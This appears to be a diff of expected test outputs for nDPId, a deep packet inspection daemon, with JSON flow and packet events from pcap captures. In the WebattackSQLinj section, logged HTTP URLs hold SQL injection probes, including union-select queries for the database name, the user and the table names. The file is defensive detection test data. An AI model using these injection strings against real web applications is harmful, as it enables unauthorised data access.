00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069164656,"flow_last_seen":1430069216559,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":918,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00572{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","packets-captured":3203,"packets-processed":3203,"total-skipped-flows":0,"total-l4-data-len":291404,"total-not-detected-flows":0,"total-guessed-flows":11,"total-detected-flows":9,"total-detection-updates":5,"total-updates":0,"current-active-flows":0,"total-active-flows":20,"total-idle-flows":20,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":116,"global_ts_msec":1430069216559}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 3203/3203

14
test/results/Oscar.pcap.out
View File

@@ -1,12 +1,12 @@
00456{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"Oscar.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00542{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"Oscar.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1434606464176}
00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1434606464176,"flow_last_seen":1434606464176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1434606464176,"l3_proto":"ip4","src_ip":"10.30.29.3","dst_ip":"178.237.24.249","src_port":63357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1434606464176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1434606464176,"pkt":"AAxCW5ILDE3pmjdICABFAABAZ9pAAEAGAAAKHh0Dsu0Y+fd9Abu9oGylAAAAALAC\/\/\/zOQAAAgQFtAEDAwUBAQgKFdAS4wAAAAAEAgAA"}
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1434606464205,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1434606464205,"pkt":"DE3pmjdIAAxCW5ILCABFAAAsd\/VAAG8GoM+y7Rj5Ch4dAwG7933\/L+hsvaBspmASQABaVgAAAgQFUAAA"}
00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1434606464205,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1434606464205,"pkt":"AAxCW5ILDE3pmjdICABFAAAo27ZAAEAGAAAKHh0Dsu0Y+fd9Abu9oGym\/y\/obVAQ\/\/\/zIQAA"}
00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":32,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1434606464176,"flow_last_seen":1434606524600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":4185,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1434606524600,"l3_proto":"ip4","src_ip":"10.30.29.3","dst_ip":"178.237.24.249","src_port":63357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1434606464176,"flow_last_seen":1434606524600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":4185,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1434606524600,"l3_proto":"ip4","src_ip":"10.30.29.3","dst_ip":"178.237.24.249","src_port":63357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":71,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1434606464176,"flow_last_seen":1434606536630,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":5450,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1434606536630,"l3_proto":"ip4","src_ip":"10.30.29.3","dst_ip":"178.237.24.249","src_port":63357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1434606464176,"flow_last_seen":1434606464176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1434606464176,"l3_proto":"ip4","src_ip":"10.30.29.3","dst_ip":"178.237.24.249","src_port":63357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1434606464176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1434606464176,"pkt":"AAxCW5ILDE3pmjdICABFAABAZ9pAAEAGAAAKHh0Dsu0Y+fd9Abu9oGylAAAAALAC\/\/\/zOQAAAgQFtAEDAwUBAQgKFdAS4wAAAAAEAgAA"}
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1434606464205,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1434606464205,"pkt":"DE3pmjdIAAxCW5ILCABFAAAsd\/VAAG8GoM+y7Rj5Ch4dAwG7933\/L+hsvaBspmASQABaVgAAAgQFUAAA"}
00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1434606464205,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1434606464205,"pkt":"AAxCW5ILDE3pmjdICABFAAAo27ZAAEAGAAAKHh0Dsu0Y+fd9Abu9oGym\/y\/obVAQ\/\/\/zIQAA"}
00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":32,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1434606464176,"flow_last_seen":1434606524600,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":4185,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1434606524600,"l3_proto":"ip4","src_ip":"10.30.29.3","dst_ip":"178.237.24.249","src_port":63357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1434606464176,"flow_last_seen":1434606524600,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":4185,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1434606524600,"l3_proto":"ip4","src_ip":"10.30.29.3","dst_ip":"178.237.24.249","src_port":63357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":71,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1434606464176,"flow_last_seen":1434606536630,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":5450,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1434606536630,"l3_proto":"ip4","src_ip":"10.30.29.3","dst_ip":"178.237.24.249","src_port":63357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":71,"source":"Oscar.pcap","alias":"nDPId-test","packets-captured":71,"packets-processed":71,"total-skipped-flows":0,"total-l4-data-len":5450,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1434606536630}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 71/71

6376
test/results/WebattackRCE.pcap.out
View File

File diff suppressed because it is too large Load Diff

108
test/results/WebattackSQLinj.pcap.out
View File

@@ -1,59 +1,59 @@
00466{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1499348407419}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348407419,"flow_last_seen":1499348407419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348407419,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36196,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1499348407419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348407419,"pkt":"ABm5CmnxAMGxFOsxCABFAAA84aRAAD4G5CusEAABwKgKMo1kAFAWk4RJAAAAAKACchDPRwAAAgQFtAQCCAoBPmXtAAAAAAEDAwc="}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1499348407419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348407419,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWS7EzBkFpOESqAScSCpZgAAAgQFtAQCCAoD6DdgAT5l7QEDAwc="}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1499348407420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348407420,"pkt":"ABm5CmnxAMGxFOsxCABFAAA04aVAAD4G5DKsEAABwKgKMo1kAFAWk4RKuxMwZYAQAOVIbgAAAQEICgE+Ze0D6Ddg"}
00993{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348407419,"flow_last_seen":1499348407420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1499348407420,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36196,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348413192,"flow_last_seen":1499348413192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348413192,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1499348413192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348413192,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/kNAAD4Gx4ysEAABwKgKMo1mAFAV3ZXTAAAAAKACchC4zgAAAgQFtAQCCAoBPmuQAAAAAAEDAwc="}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1499348413192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348413192,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWbwopjJFd2V1KAScSDvVQAAAgQFtAQCCAoD6D0DAT5rkAEDAwc="}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1499348413193,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348413193,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/kRAAD4Gx5OsEAABwKgKMo1mAFAV3ZXU8KKYyoAQAOWOXQAAAQEICgE+a5AD6D0D"}
01007{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348413192,"flow_last_seen":1499348413193,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":460,"flow_tot_l4_payload_len":460,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1499348413193,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348422024,"flow_last_seen":1499348422024,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348422024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1499348422024,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348422024,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8A7ZAAD4GwhqsEAABwKgKMo1oAFD9gXeGAAAAAKACchDm1AAAAgQFtAQCCAoBPnQwAAAAAAEDAwc="}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1499348422024,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348422024,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWik93fQ\/YF3h6AScSCBYAAAAgQFtAQCCAoD6EWjAT50MAEDAwc="}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1499348422025,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348422025,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0A7dAAD4GwiGsEAABwKgKMo1oAFD9gXeHpPd30YAQAOUgaAAAAQEICgE+dDAD6EWj"}
01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348422024,"flow_last_seen":1499348422025,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":537,"flow_tot_l4_payload_len":537,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1499348422025,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+database%28%29%2C+user%28%29%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348433464,"flow_last_seen":1499348433464,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348433464,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1499348433464,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348433464,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WwtAAD4GasWsEAABwKgKMo1qAFDC1CRXAAAAAKACchBpgwAAAgQFtAQCCAoBPn9cAAAAAAEDAwc="}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1499348433464,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348433464,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWqDJLV7wtQkWKAScSDdCgAAAgQFtAQCCAoD6FDPAT5\/XAEDAwc="}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1499348433465,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348433465,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WwxAAD4GasysEAABwKgKMo1qAFDC1CRYgyS1fIAQAOV8EgAAAQEICgE+f1wD6FDP"}
01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348433464,"flow_last_seen":1499348433465,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1499348433465,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+null%2C+table_name+from+information_schema.tables%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348467295,"flow_last_seen":1499348467295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348467295,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1499348467295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348467295,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NrBAAD4GjyCsEAABwKgKMo1sAFAXzJbWAAAAAKACchCBAAAAAgQFtAQCCAoBPqBmAAAAAAEDAwc="}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1499348467295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348467295,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWwuedQjF8yW16AScSAJgQAAAgQFtAQCCAoD6HHZAT6gZgEDAwc="}
